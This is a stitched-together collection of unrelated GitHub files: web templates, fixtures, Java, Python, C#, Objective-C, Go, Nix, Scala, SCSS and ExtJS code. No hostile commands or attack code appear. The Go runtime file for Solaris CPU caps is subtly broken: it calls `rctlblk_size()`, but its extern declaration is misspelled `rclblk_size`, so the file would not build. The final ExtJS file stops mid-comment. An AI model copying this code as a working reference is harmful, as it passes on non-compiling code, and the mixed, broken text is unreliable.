<script src="{% static "vendor/jqwidgets/jqxgrid.sort.js" %}" type="text/javascript"></script>
<script src="{% static "vendor/jqwidgets/jqxgrid.pager.js" %}" type="text/javascript"></script>
<script src="{% static "vendor/jqwidgets/jqxgrid.grouping.js" %}" type="text/javascript"></script>
<script src="{% static "vendor/jqwidgets/jqxgrid.aggregates.js" %}" type="text/javascript"></script>
<script src="{% static "vendor/jqwidgets/jqxcalendar.js" %}" type="text/javascript"></script>
<script src="{% static "vendor/jqwidgets/jqxdatetimeinput.js" %}" type="text/javascript"></script>
<script src="{% static "vendor/jqwidgets/jqxcheckbox.js" %}" type="text/javascript"></script>
<script src="{% static "vendor/jqwidgets/globalization/globalize.js" %}" type="text/javascript"></script>
<script src="{% static "vendor/jqwidgets/jqxwindow.js" %}" type="text/javascript"></script>
<script src="{% static "vendor/jqwidgets/jqxdata.export.js" %}" type="text/javascript"></script>
<script src="{% static "vendor/jqwidgets/jqxgrid.export.js" %}" type="text/javascript"></script>
<script src="{% static "vendor/jqwidgets/jqxdraw.js" %}" type="text/javascript"></script>
<script src="{% static "vendor/jqwidgets/jqxchart.core.js" %}" type="text/javascript"></script>
<script src="{% static "vendor/jqwidgets/jqxtabs.js" %}" type="text/javascript"></script>
<script src="{% static "vendor/jqwidgets/jqxdatatable.js" %}" type="text/javascript"></script>
<script src="{% static "vendor/jqwidgets/jqxtreegrid.js" %}" type="text/javascript"></script>
<script src="{% static "vendor/jqwidgets/jqxchart.rangeselector.js" %}" type="text/javascript"></script>
{ "pile_set_name": "Github" }
-- Test fixture: seed rows for table t (three integer columns).
-- NOTE(review): statements intentionally have no trailing semicolons --
-- presumably the harness executes them one per line; confirm before
-- reformatting or batching them.
insert into t values (91, 10, 100)
insert into t values (92, 20, 200)
insert into t values (95, 50, 500)
insert into t values (96, 60, 600)
insert into t values (910, 100, 1000)
insert into t values (923, 230, 2300)
insert into t values (9123, 1230, 12300)
insert into t values (911115, 9111150, 91111500)
insert into t values (-91, -910, -9100)
insert into t values (90, 0, 900)
{ "pile_set_name": "Github" }
/*
 * Copyright (c) 2019 The sky Authors.
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *    http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */

package com.sky.xposed.rimet.plugin.interfaces;

import android.app.Activity;

/**
 * Contract implemented by every Xposed plugin in this project.
 *
 * Created by sky on 2018/12/21.
 */
public interface XPlugin {

    /**
     * Returns the plugin's descriptive information (id, name, description).
     * @return the plugin's {@link Info}
     */
    Info getInfo();

    /**
     * Reports whether this plugin needs to handle the current package.
     * @return {@code true} if the plugin should be activated
     */
    boolean isHandler();

    /**
     * Performs one-time initialization of the plugin.
     */
    void initialization();

    /**
     * Called to process the loaded package (apply hooks, etc.).
     */
    void onHandleLoadPackage();

    /**
     * Releases any resources held by the plugin.
     */
    void release();

    /**
     * Opens this plugin's settings UI.
     * @param activity the activity used to present the settings
     */
    void openSettings(Activity activity);

    /**
     * Reports whether the feature identified by {@code flag} is enabled.
     * @param flag feature identifier
     * @param defValue value returned when no stored setting exists
     */
    boolean isEnable(int flag, boolean defValue);

    /**
     * Enables or disables the feature identified by {@code flag}.
     * @param flag feature identifier
     * @param enable new enabled state
     */
    void setEnable(int flag, boolean enable);

    /**
     * Descriptive information about a plugin.
     */
    interface Info {

        // Unique plugin id.
        int getId();

        // Human-readable plugin name.
        String getName();

        // Short plugin description.
        String getDesc();
    }
}
{ "pile_set_name": "Github" }
<!--- Copyright 2015 The AMP HTML Authors. All Rights Reserved. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS-IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. --> # AppNexus ## Examples ### Basic single ad - tagid ```html <amp-ad width="300" height="250" type="appnexus" data-tagid="6063968"> </amp-ad> ``` ### Basic single ad - member and code ```html <amp-ad width="300" height="250" type="appnexus" data-member="958" data-code="inv_code_test" > </amp-ad> ``` ### AST single ad call with keywords Note: you should use either the basic setup or AST setup. Do not mix types on the same page. 
```html <amp-ad width="320" height="50" type="appnexus" data-target="apn_ad_40954389058" json='{"pageOpts": {"member": 958,"invCode": "ast_guaranteed_prios_1","keywords": {"adSite":"mobile-smh","cat":"business","cat1":"bankingandfinance","ctype":"article","synd":"amp"}},"targetId": "apn_ad_40954389058","sizes": [[300, 50]],"adUnits": [{"invCode": "ast_guaranteed_prios_1","disablePsa": true,"sizes": [[320, 50],[300, 50]],"targetId": "apn_ad_5675675648","keywords": {"pos": 1}},{"invCode": "ast_guaranteed_prios_1","disablePsa": true,"sizes": [30, 250],"targetId": "apn_ad_5675675648","keywords": {"pos": 2}}]}' class="i-amphtml-element i-amphtml-layout-fixed i-amphtml-layout-size-defined i-amphtml-layout" > </amp-ad> ``` ### AST for multiple sync ads on the page ```html <amp-ad width="300" height="250" type="appnexus" data-target="apn_ad_40954389058" json='{"pageOpts": {"member": 958},"adUnits": [{"disablePsa": true,"invCode": "ast_guaranteed_prios_1","tagId": 12345,"sizes": [300, 250],"targetId": "apn_ad_40954389058"}, {"invCode": "ast_guaranteed_prios_1","tagId": 456,"sizes": [160, 600],"targetId": "apn_ad_5675675648"}]}' > </amp-ad> <amp-ad width="160" height="600" type="appnexus" data-target="apn_ad_5675675648" json='{"pageOpts": {"member": 958},"adUnits": [{"disablePsa": true,"invCode": "ast_guaranteed_prios_1","tagId": 12345,"sizes": [300, 250],"targetId": "apn_ad_40954389058"}, {"invCode": "ast_guaranteed_prios_1","tagId": 456,"sizes": [160, 600],"targetId": "apn_ad_5675675648"}]}' > </amp-ad> ``` ### AST Infinite scroll ads on the page, Include adUnit details only in the amp-ad tag which you want to lazy load Note: You would lose competitive exclusion if you use this setup. 
```html <amp-ad width="300" height="250" type="appnexus" data-target="apn_ad_40954389058" json='{"pageOpts": {"member": 958},"adUnits": [{"disablePsa": true,"invCode": "ast_guaranteed_prios_1","tagId": 12345,"sizes": [300, 250],"targetId": "apn_ad_40954389058"}, {"invCode": "ast_guaranteed_prios_1","tagId": 456,"sizes": [160, 600],"targetId": "apn_ad_5675675648"}]}' > </amp-ad> <amp-ad width="160" height="600" type="appnexus" data-target="apn_ad_5675675648" json='{"pageOpts": {"member": 958},"adUnits": [{"disablePsa": true,"invCode": "ast_guaranteed_prios_1","tagId": 12345,"sizes": [300, 250],"targetId": "apn_ad_40954389058"}, {"invCode": "ast_guaranteed_prios_1","tagId": 456,"sizes": [160, 600],"targetId": "apn_ad_5675675648"}]}' > </amp-ad> By including `apn_ad_3` adUnit details separately ads for this unit will only be requested when user scrolls to this tag <amp-ad width="728" height="90" type="appnexus" data-target="apn_ad_3" json='{"pageOpts": {"member": 958},"adUnits": [{"tagId": 6063968,"sizes": [728,90],"targetId":"apn_ad_3"}]}' > </amp-ad> ``` ## Configuration See AppNexus [Tiny Tag documentation](https://wiki.appnexus.com/display/adnexusdocumentation/Dynamic+TinyTag+Parameters) or [AST documentation](https://wiki.appnexus.com/pages/viewpage.action?pageId=75793258) for details on input parameters. ### Enable debugging To enable debugging with the AST type of tags, just set `data-debug=true` in all your amp-ad tags. 
```html <amp-ad width="300" height="250" type="appnexus" data-target="apn_ad_40954389058" data-debug="true" json='{"pageOpts":{"member": 958}, "adUnits": [{"disablePsa": true, "invCode": "ast_guaranteed_prios_1","sizes": [300,250],"targetId": "apn_ad_40954389058"}, {"invCode": "ast_guaranteed_prios_1","sizes": [160,600],"targetId":"apn_ad_5675675648"}]}' > </amp-ad> <amp-ad width="160" height="600" type="appnexus" data-target="apn_ad_5675675648" data-debug="true" json='{"pageOpts":{"member": 958}, "adUnits": [{"disablePsa": true, "invCode": "ast_guaranteed_prios_1","sizes": [300,250],"targetId": "apn_ad_40954389058"}, {"invCode": "ast_guaranteed_prios_1","sizes": [160,600],"targetId":"apn_ad_5675675648"}]}' > </amp-ad> ```
{ "pile_set_name": "Github" }
'''
Implementation of a simplified agent - with expectation/action split, but without normalization in the action stream
'''
from __future__ import print_function
import numpy as np
import time
import tensorflow as tf
from . import tf_ops as my_ops
import os
import re

from .agent import Agent

class FuturePredictorAgentAdvantageNoNorm(Agent):
    def make_net(self, input_images, input_measurements, input_actions, input_objectives, reuse=False):
        """Build the prediction network (dueling value/advantage streams).

        Returns a pair (pred_all, pred_relevant): predictions for every
        discrete action, and the predictions masked down to the actions
        actually taken (input_actions is used as a boolean one-hot mask).
        """
        if reuse:
            tf.get_variable_scope().reuse_variables()

        # Value stream predicts one target vector; advantage stream predicts
        # one target vector per discrete action. Both reuse fc_joint_params
        # with only the final layer width changed.
        self.fc_val_params = np.copy(self.fc_joint_params)
        self.fc_val_params['out_dims'][-1] = self.target_dim
        self.fc_adv_params = np.copy(self.fc_joint_params)
        self.fc_adv_params['out_dims'][-1] = len(self.net_discrete_actions) * self.target_dim
        p_img_conv = my_ops.conv_encoder(input_images, self.conv_params, 'p_img_conv', msra_coeff=0.9)
        p_img_fc = my_ops.fc_net(my_ops.flatten(p_img_conv), self.fc_img_params, 'p_img_fc', msra_coeff=0.9)
        p_meas_fc = my_ops.fc_net(input_measurements, self.fc_meas_params, 'p_meas_fc', msra_coeff=0.9)
        if isinstance(self.fc_obj_params, np.ndarray):
            # Objective coefficients are fed through their own FC stream and
            # concatenated with the image and measurement features.
            p_obj_fc = my_ops.fc_net(input_objectives, self.fc_obj_params, 'p_obj_fc', msra_coeff=0.9)
            p_concat_fc = tf.concat([p_img_fc,p_meas_fc,p_obj_fc], 1)
        else:
            p_concat_fc = tf.concat([p_img_fc,p_meas_fc], 1)
            if self.random_objective_coeffs:
                raise Exception('Need fc_obj_params with randomized objectives')

        p_val_fc = my_ops.fc_net(p_concat_fc, self.fc_val_params, 'p_val_fc', last_linear=True, msra_coeff=0.9)
        p_adv_fc = my_ops.fc_net(p_concat_fc, self.fc_adv_params, 'p_adv_fc', last_linear=True, msra_coeff=0.9)

        # Reshape advantages to (batch, num_actions, target_dim).
        adv_reshape = tf.reshape(p_adv_fc, [-1, len(self.net_discrete_actions), self.target_dim])

        # NOTE: unlike the normalized variant, the advantage mean is NOT
        # subtracted here (the "NoNorm" in the class name).
        #pred_all_nomean = adv_reshape - tf.reduce_mean(adv_reshape, reduction_indices=1, keep_dims=True)
        pred_all = adv_reshape + tf.reshape(p_val_fc, [-1, 1, self.target_dim])
        pred_relevant = tf.boolean_mask(pred_all, tf.cast(input_actions, tf.bool))

        return pred_all, pred_relevant

    def make_losses(self, pred_relevant, targets_preprocessed, objective_indices, objective_coeffs):
        """Build the training loss and summary ops.

        Returns (full_loss, errs_to_print, short_summary, detailed_summary).
        NaN targets are ignored both in the loss (mse_ignore_nans) and in the
        logged mean objective.
        """
        # make a loss function and compute some summary numbers
        per_target_loss = my_ops.mse_ignore_nans(pred_relevant, targets_preprocessed, reduction_indices=0)
        loss = tf.reduce_sum(per_target_loss)

        # compute objective value, just for logging purposes
        # TODO add multiplication by the objective_coeffs (somehow not trivial)
        obj = tf.reduce_sum(self.postprocess_predictions(targets_preprocessed), 1)
        #obj = tf.sum(self.postprocess_predictions(targets_preprocessed[:,objective_indices]) * objective_coeffs[None,:], axis=1)
        # Replace NaN objectives with 0 and average over the valid ones only.
        obj_nonan = tf.where(tf.is_nan(obj), tf.zeros_like(obj), obj)
        num_valid_targets = tf.reduce_sum(1-tf.cast(tf.is_nan(obj), tf.float32))
        mean_obj = tf.reduce_sum(obj_nonan) / num_valid_targets

        # summaries
        obj_sum = tf.summary.scalar("objective_todo", mean_obj)
        #TODO
        per_target_loss_sums = []
        #per_target_loss_sums = [tf.summary.scalar(name, loss) for name,loss in zip(self.target_names,per_target_loss)]
        loss_sum = tf.summary.scalar("full loss", loss)

        #self.per_target_loss = tf.get_variable('avg_targets', [self.target_dim], initializer=tf.constant_initializer(value=0.))

        full_loss = loss
        errs_to_print = [loss]
        short_summary = [loss_sum]
        detailed_summary = per_target_loss_sums + [obj_sum]

        return full_loss, errs_to_print, short_summary, detailed_summary

    def act_net(self, state_imgs, state_meas, objective_coeffs):
        """Choose an action for each state by maximizing the predicted objective.

        objective_coeffs may be a single coefficient vector (broadcast over the
        batch) or one vector per state.
        """
        #Act given a state and objective_coeffs
        if objective_coeffs.ndim == 1:
            # Single objective vector: tile it across the batch.
            curr_objective_coeffs = np.tile(objective_coeffs[None,:],(state_imgs.shape[0],1))
        else:
            curr_objective_coeffs = objective_coeffs

        predictions = self.sess.run(self.pred_all, feed_dict={self.input_images: state_imgs,
                                                              self.input_measurements: state_meas,
                                                              self.input_objective_coeffs: curr_objective_coeffs})
        # Weight the selected prediction targets by the objective coefficients
        # and pick the action with the highest total objective per state.
        self.curr_predictions = predictions[:,:,self.objective_indices]*curr_objective_coeffs[:,None,:]
        self.curr_objectives = np.sum(self.curr_predictions, axis=2)
        curr_action = np.argmax(self.curr_objectives, axis=1)
        return curr_action
{ "pile_set_name": "Github" }
# Simple Flask Application

This is a simple Flask application which takes a name from users and greets them by their name.

## Deployed application

[https://evening-falls-17572.herokuapp.com](https://evening-falls-17572.herokuapp.com)

## Setup

- Install Python 3. Here's a link to the documentation: [click here](http://docs.python-guide.org/en/latest/).
- Start up the terminal and type ```pip install flask```.
- Go to this application's root directory and open a terminal.
- On Linux & Mac, type ```export FLASK_APP=app.py```; on Windows, type ```set FLASK_APP=app.py```.
- Then run ```python -m flask run```.
- Go to ```http://127.0.0.1:5000``` in your browser, and you're done.
{ "pile_set_name": "Github" }
# ServiceAccount for Presto pods. Optional annotations are injected from
# .Values.presto.spec.annotations in the chart values.
apiVersion: v1
kind: ServiceAccount
metadata:
  name: presto
  labels:
    app: presto
{{- if .Values.presto.spec.annotations }}
  annotations:
{{ toYaml .Values.presto.spec.annotations | indent 4 }}
{{- end }}
{ "pile_set_name": "Github" }
// NOTE(review): test-fixture input for AsyncConverter's FixReturnValueToTask
// cases — TestAsync mixes a plain `return 5;` with `return await FooAsync();`.
// This file is consumed as data by the test suite; keep it in sync with the
// corresponding expected-output fixture before changing anything here.
using System.Threading.Tasks;

namespace AsyncConverter.Tests.Test.Data.FixReturnValueToTaskTests
{
    public class Class
    {
        public async Task<int> TestAsync(bool a)
        {
            if(a)
                return 5;
            return await FooAsync();
        }

        public Task<int> FooAsync()
        {
            return Task.FromResult(5);
        }
    }
}
{ "pile_set_name": "Github" }
<!-- 24x24dp vector drawable. The path is filled white and tinted at runtime
     through ?attr/colorControlNormal, so it follows the current theme. -->
<vector xmlns:android="http://schemas.android.com/apk/res/android"
        android:width="24dp"
        android:height="24dp"
        android:viewportWidth="24"
        android:viewportHeight="24"
        android:tint="?attr/colorControlNormal">
    <path
        android:fillColor="@android:color/white"
        android:pathData="M19,3h-4.18C14.4,1.84 13.3,1 12,1c-1.3,0 -2.4,0.84 -2.82,2L5,3c-1.1,0 -2,0.9 -2,2v14c0,1.1 0.9,2 2,2h14c1.1,0 2,-0.9 2,-2L21,5c0,-1.1 -0.9,-2 -2,-2zM12,3c0.55,0 1,0.45 1,1s-0.45,1 -1,1 -1,-0.45 -1,-1 0.45,-1 1,-1zM12,18l-5,-5h3L10,9h4v4h3l-5,5z"/>
</vector>
{ "pile_set_name": "Github" }
<?xml version="1.0" encoding="UTF-8"?> <Scheme LastUpgradeVersion = "1000" version = "1.3"> <BuildAction parallelizeBuildables = "YES" buildImplicitDependencies = "YES"> <BuildActionEntries> <BuildActionEntry buildForTesting = "YES" buildForRunning = "YES" buildForProfiling = "YES" buildForArchiving = "YES" buildForAnalyzing = "YES"> <BuildableReference BuildableIdentifier = "primary" BlueprintIdentifier = "54B51125216C3D840033A6F3" BuildableName = "Maps.app" BlueprintName = "Maps" ReferencedContainer = "container:Maps.xcodeproj"> </BuildableReference> </BuildActionEntry> </BuildActionEntries> </BuildAction> <TestAction buildConfiguration = "Debug" selectedDebuggerIdentifier = "Xcode.DebuggerFoundation.Debugger.LLDB" selectedLauncherIdentifier = "Xcode.DebuggerFoundation.Launcher.LLDB" shouldUseLaunchSchemeArgsEnv = "YES"> <Testables> </Testables> <MacroExpansion> <BuildableReference BuildableIdentifier = "primary" BlueprintIdentifier = "54B51125216C3D840033A6F3" BuildableName = "Maps.app" BlueprintName = "Maps" ReferencedContainer = "container:Maps.xcodeproj"> </BuildableReference> </MacroExpansion> <AdditionalOptions> </AdditionalOptions> </TestAction> <LaunchAction buildConfiguration = "Debug" selectedDebuggerIdentifier = "Xcode.DebuggerFoundation.Debugger.LLDB" selectedLauncherIdentifier = "Xcode.DebuggerFoundation.Launcher.LLDB" language = "en" region = "US" launchStyle = "0" useCustomWorkingDirectory = "NO" ignoresPersistentStateOnLaunch = "NO" debugDocumentVersioning = "YES" debugServiceExtension = "internal" allowLocationSimulation = "YES"> <BuildableProductRunnable runnableDebuggingMode = "0"> <BuildableReference BuildableIdentifier = "primary" BlueprintIdentifier = "54B51125216C3D840033A6F3" BuildableName = "Maps.app" BlueprintName = "Maps" ReferencedContainer = "container:Maps.xcodeproj"> </BuildableReference> </BuildableProductRunnable> <AdditionalOptions> </AdditionalOptions> </LaunchAction> <ProfileAction buildConfiguration = "Release" 
shouldUseLaunchSchemeArgsEnv = "YES" savedToolIdentifier = "" useCustomWorkingDirectory = "NO" debugDocumentVersioning = "YES"> <BuildableProductRunnable runnableDebuggingMode = "0"> <BuildableReference BuildableIdentifier = "primary" BlueprintIdentifier = "54B51125216C3D840033A6F3" BuildableName = "Maps.app" BlueprintName = "Maps" ReferencedContainer = "container:Maps.xcodeproj"> </BuildableReference> </BuildableProductRunnable> </ProfileAction> <AnalyzeAction buildConfiguration = "Debug"> </AnalyzeAction> <ArchiveAction buildConfiguration = "Release" revealArchiveInOrganizer = "YES"> </ArchiveAction> </Scheme>
{ "pile_set_name": "Github" }
//
//  NILViewController.m
//  TransformAnimations
//
//  Created by Bryan Oltman on 5/24/13.
//  Copyright (c) 2013 Bryan Oltman. All rights reserved.
//

#import "NILViewController.h"

@implementation NILViewController

// Attach left/right swipe recognizers to the two table views and park the
// right table view one screen-width off to the right.
- (void)viewDidLoad
{
    [super viewDidLoad];

    UISwipeGestureRecognizer *recognizer = [[UISwipeGestureRecognizer alloc] initWithTarget:self
                                                                                     action:@selector(viewSwiped:)];
    recognizer.direction = UISwipeGestureRecognizerDirectionLeft;
    [self.leftTableView addGestureRecognizer:recognizer];

    recognizer = [[UISwipeGestureRecognizer alloc] initWithTarget:self
                                                           action:@selector(viewSwiped:)];
    recognizer.direction = UISwipeGestureRecognizerDirectionRight;
    [self.rightTableView addGestureRecognizer:recognizer];

    self.rightTableView.frame = CGRectOffset(self.rightTableView.frame, self.view.frame.size.width, 0);
}

// Swiping left on the left table animates it away (scaled + translated) and
// slides the right table in; swiping right on the right table restores both.
- (void)viewSwiped:(UISwipeGestureRecognizer *)sender
{
    CAAnimationEasingFunction f = CAAnimationEasingFunctionEaseOutElastic;
    CGFloat d = 1;
    if (sender.direction == UISwipeGestureRecognizerDirectionLeft && sender.view == self.leftTableView) {
        CATransform3D tr;

        // An example of how to "stack" transforms
        tr = CATransform3DMakeScale(2.5, 2.5, 1.0);
        tr = CATransform3DTranslate(tr, 95, 0, 0);

        [CAAnimation addAnimationToLayer:self.leftTableView.layer
                                duration:d
                               transform:tr
//                             transform:CATransform3DMakeRotation(250, 0, 0, 1)
//                             transform:CATransform3DMakeTranslation(-self.view.bounds.size.width, 0, 0)
                          easingFunction:f];

        [CAAnimation addAnimationToLayer:self.rightTableView.layer
                                duration:d
                               transform:CATransform3DMakeTranslation(-self.view.bounds.size.width, 0, 0)
                          easingFunction:f];
    } else if (sender.direction == UISwipeGestureRecognizerDirectionRight && sender.view == self.rightTableView) {
        [CAAnimation addAnimationToLayer:self.leftTableView.layer
                                duration:d
                               transform:CATransform3DIdentity
                          easingFunction:f];
        [CAAnimation addAnimationToLayer:self.rightTableView.layer
                                duration:d
                               transform:CATransform3DIdentity
                          easingFunction:f];
    }
}

#pragma mark - Table View

- (NSInteger)tableView:(UITableView *)tableView numberOfRowsInSection:(NSInteger)section
{
    return 150;
}

- (UITableViewCell *)tableView:(UITableView *)aTableView cellForRowAtIndexPath:(NSIndexPath *)aIndexPath
{
    static NSString *reuseId = @"reuseId";
    UITableViewCell *cell = [aTableView dequeueReusableCellWithIdentifier:reuseId];
    if (!cell) {
        cell = [[UITableViewCell alloc] initWithStyle:UITableViewCellStyleDefault
                                      reuseIdentifier:reuseId];
    }

    // FIX: aIndexPath.row is NSInteger; %d expects int, which is wrong on
    // 64-bit platforms. Use %ld with an explicit (long) cast.
    cell.textLabel.text = [NSString stringWithFormat:@"This is row %ld", (long)aIndexPath.row];
    return cell;
}

@end
{ "pile_set_name": "Github" }
// Copyright 2019 The Go Authors. All rights reserved. // Use of this source code is governed by a BSD-style // license that can be found in the LICENSE file. package runtime import ( "unsafe" ) // Return the minimum value seen for the zone CPU cap, or 0 if no cap is // detected. func getcpucap() uint64 { // The resource control block is an opaque object whose size is only // known to libc. In practice, given the contents, it is unlikely to // grow beyond 8KB so we'll use a static buffer of that size here. const rblkmaxsize = 8 * 1024 if rctlblk_size() > rblkmaxsize { return 0 } // The "zone.cpu-cap" resource control, as described in // resource_controls(5), "sets a limit on the amount of CPU time that // can be used by a zone. The unit used is the percentage of a single // CPU that can be used by all user threads in a zone, expressed as an // integer." A C string of the name must be passed to getrctl(2). name := []byte("zone.cpu-cap\x00") // To iterate over the list of values for a particular resource // control, we need two blocks: one for the previously read value and // one for the next value. var rblk0 [rblkmaxsize]byte var rblk1 [rblkmaxsize]byte rblk := &rblk0[0] rblkprev := &rblk1[0] var flag uint32 = _RCTL_FIRST var capval uint64 = 0 for { if getrctl(unsafe.Pointer(&name[0]), unsafe.Pointer(rblkprev), unsafe.Pointer(rblk), flag) != 0 { // The end of the sequence is reported as an ENOENT // failure, but determining the CPU cap is not critical // here. We'll treat any failure as if it were the end // of sequence. break } lflags := rctlblk_get_local_flags(unsafe.Pointer(rblk)) action := rctlblk_get_local_action(unsafe.Pointer(rblk), 0) if (lflags&_RCTL_LOCAL_MAXIMAL) == 0 && action == _RCTL_LOCAL_DENY { // This is a finite (not maximal) value representing a // cap (deny) action. 
v := rctlblk_get_value(unsafe.Pointer(rblk)) if capval == 0 || capval > v { capval = v } } // Swap the blocks around so that we can fetch the next value t := rblk rblk = rblkprev rblkprev = t flag = _RCTL_NEXT } return capval } func getncpu() int32 { n := int32(sysconf(__SC_NPROCESSORS_ONLN)) if n < 1 { return 1 } if cents := int32(getcpucap()); cents > 0 { // Convert from a percentage of CPUs to a number of CPUs, // rounding up to make use of a fractional CPU // e.g., 336% becomes 4 CPUs ncap := (cents + 99) / 100 if ncap < n { return ncap } } return n } //extern getrctl func getrctl(controlname, oldbuf, newbuf unsafe.Pointer, flags uint32) int32 //extern rctlblk_get_local_action func rctlblk_get_local_action(buf, signalp unsafe.Pointer) uint32 //extern rctlblk_get_local_flags func rctlblk_get_local_flags(buf unsafe.Pointer) uint32 //extern rctlblk_get_value func rctlblk_get_value(buf unsafe.Pointer) uint64 //extern rctlblk_size func rclblk_size() uintptr
{ "pile_set_name": "Github" }
{ fetchurl, ... }: { baseName = ''db3''; version = ''cl-20150302-git''; description = ''DB3 file reader''; deps = [ ]; src = fetchurl { url = ''http://beta.quicklisp.org/archive/cl-db3/2015-03-02/cl-db3-20150302-git.tgz''; sha256 = ''0mwdpb7cdvxdcbyg3ags6xzwhblai170q3p20njs3v73s30dbzxi''; }; packageName = "db3"; asdFilesToKeep = ["db3.asd"]; overrides = x: x; } /* (SYSTEM db3 DESCRIPTION DB3 file reader SHA256 0mwdpb7cdvxdcbyg3ags6xzwhblai170q3p20njs3v73s30dbzxi URL http://beta.quicklisp.org/archive/cl-db3/2015-03-02/cl-db3-20150302-git.tgz MD5 578896a3f60f474742f240b703f8c5f5 NAME db3 FILENAME db3 DEPS NIL DEPENDENCIES NIL VERSION cl-20150302-git SIBLINGS NIL PARASITES NIL) */
{ "pile_set_name": "Github" }
/* * Copyright 2016 The BigDL Authors. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package com.intel.analytics.bigdl.nn import com.intel.analytics.bigdl.tensor.Tensor import com.intel.analytics.bigdl.utils.T import com.intel.analytics.bigdl.utils.serializer.ModuleSerializationTest import org.scalatest.{BeforeAndAfter, FlatSpec, Matchers} import scala.util.Random @com.intel.analytics.bigdl.tags.Serial class SplitTableSpec extends FlatSpec with BeforeAndAfter with Matchers { "A BifurcateSplitTable " should "generate correct output and grad" in { val seed = 100 Random.setSeed(seed) val dim = 2 val module = new BifurcateSplitTable[Double](dim) val input = Tensor[Double](3, 4).randn() val expectedGradInput = Tensor[Double]().resizeAs(input).randn() val gradOutput = T(expectedGradInput.narrow(dim, 1, 2), expectedGradInput.narrow(dim, 3, 2)) val output = module.forward(input) val gradInput = module.backward(input, gradOutput) output.length() should be (2) val left = output(1).asInstanceOf[Tensor[Double]] val right = output(2).asInstanceOf[Tensor[Double]] left should be (input.narrow(dim, 1, 2)) right should be (input.narrow(dim, 3, 2)) gradInput should be (expectedGradInput) } } class BifurcateSplitTableSerialTest extends ModuleSerializationTest { override def test(): Unit = { val batchNorm = BifurcateSplitTable[Float](1).setName("batchNorm") val input = Tensor[Float](2, 5).apply1(_ => Random.nextFloat()) runSerializationTest(batchNorm, input) } } class SplitTableSerialTest 
extends ModuleSerializationTest { override def test(): Unit = { val splitTable = SplitTable[Float](2).setName("splitTable") val input = Tensor[Float](2, 10).apply1( e => Random.nextFloat()) runSerializationTest(splitTable, input) } }
{ "pile_set_name": "Github" }
$winner: #5cc900; $border: #cef0af; $finalists: #effae4; $empty: #fafdf6; .track { background-color: $winner; } .winner { border-left: solid 1px $border; border-right: solid 1px $border; color: $winner; } .finalist { background-color: $finalists; } .filler { background-color: $finalists; } .empty { background-color: $empty; }
{ "pile_set_name": "Github" }
/** * This file is part of OpenMediaVault. * * @license http://www.gnu.org/licenses/gpl.html GPL Version 3 * @author Volker Theile <[email protected]> * @copyright Copyright (c) 2009-2020 Volker Theile * * OpenMediaVault is free software: you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation, either version 3 of the License, or * any later version. * * OpenMediaVault is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with OpenMediaVault. If not, see <http://www.gnu.org/licenses/>. */ // require("js/omv/workspace/window/Container.js") // require("js/omv/tab/Panel.js") /** * @ingroup webgui * A workspace window displaying a tab panel. * @class OMV.workspace.window.Tab * @derived OMV.workspace.window.Container */ Ext.define("OMV.workspace.window.Tab", { extend: "OMV.workspace.window.Container", requires: [ "OMV.tab.Panel" ], tabClassName: "OMV.tab.Panel", constructor: function(config) { var me = this; config = Ext.apply({ tabConfig: {}, tabItems: [] }, config || {}); me.callParent([ config ]); }, getWindowItems: function() { var me = this; me.tp = me.initTab(); return me.tp; }, /** * Initialize the tab panel displayed in this window. * @return The tab panel object. */ initTab: function() { var me = this; return Ext.create(me.tabClassName, Ext.apply({ border: false, activeTab: 0, layoutOnTabChange: true, enableTabScroll: true, defaults: { readOnly: me.readOnly }, items: me.getTabItems(me) }, me.getTabConfig(me))); }, /** * Returns additional tab configuration options. * @param c This component object. * @return The tab panel configuration object. 
*/ getTabConfig: function(c) { return this.tabConfig; }, /** * Returns the items displayed in the property window form. * This function must be overwritten by every derived class. * @param c This component object. * @return An array of items displayed in the tab panel. */ getTabItems: function(c) { return this.tabItems; }, /** * Returns the tab panel. * @return The tab panel object. */ getTab: function() { return this.tp; }, /** * Validate the tab values. * @return Returns TRUE if client-side validation on the tab * is successful. */ isValid: function() { var me = this; var valid = true; var tab = me.getTab(); tab.items.each(function(item) { // Clear invalid flag. tab.clearInvalidTab(item); // Check if there is a validation function and execute it // if existing. if(Ext.isFunction(item.isValid)) { if(!item.isValid()) { valid = false; // Mark tab panel component as invalid. tab.markInvalidTab(item); } } }); return valid; }, /** * Clears all invalid field messages in this tab and its sub panels. */ clearInvalid: function() { var me = this; var tab = me.getTab(); tab.items.each(function(item) { tab.clearInvalidTab(item); if(Ext.isFunction(item.clearInvalid)) item.clearInvalid(); }); }, /** * Mark fields in this tab and its sub panels invalid in bulk. * @param errors Either an array in the tab * [{id:'fieldId', msg:'The message'},...] or an object hash of * {id: msg, id2: msg2} * @return The basic form panel. */ markInvalid: function(errors) { var me = this; me.getTab().items.each(function(item) { if(Ext.isFunction(item.markInvalid)) item.markInvalid(errors); }); }, /** * Checks if any fields in this tab have changed from their original * values. If the values have been loaded into the tab then these are * the original ones. * @return Returns TRUE if any fields in this tab have changed from * their original values. 
